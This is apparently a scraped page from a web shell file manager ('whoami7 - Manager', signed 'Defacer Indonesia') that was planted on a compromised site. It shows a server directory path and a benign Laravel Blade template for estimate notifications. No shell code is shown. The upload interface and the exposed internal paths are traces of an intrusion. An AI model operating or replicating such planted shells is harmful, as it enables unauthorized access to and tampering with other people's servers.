whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
resources
/
views
/
notifications
/
client
/
Upload File:
files >> /home/kckglobal/www/portal/resources/views/notifications/client/new_estimate.blade.php
@php if ($notification->data['estimate_number'] == '') { $estimate = \App\Models\Estimate::find($notification->data['id']); $estimateNumber = $estimate->estimate_number; } else { $estimateNumber = $notification->data['estimate_number']; } @endphp <x-cards.notification :notification="$notification" :link="route('estimates.show', $notification->data['id'])" :image="company()->logo_url" :title="__('email.estimate.subject')" :text="$estimateNumber" :time="$notification->created_at" />
Copyright ©2021 || Defacer Indonesia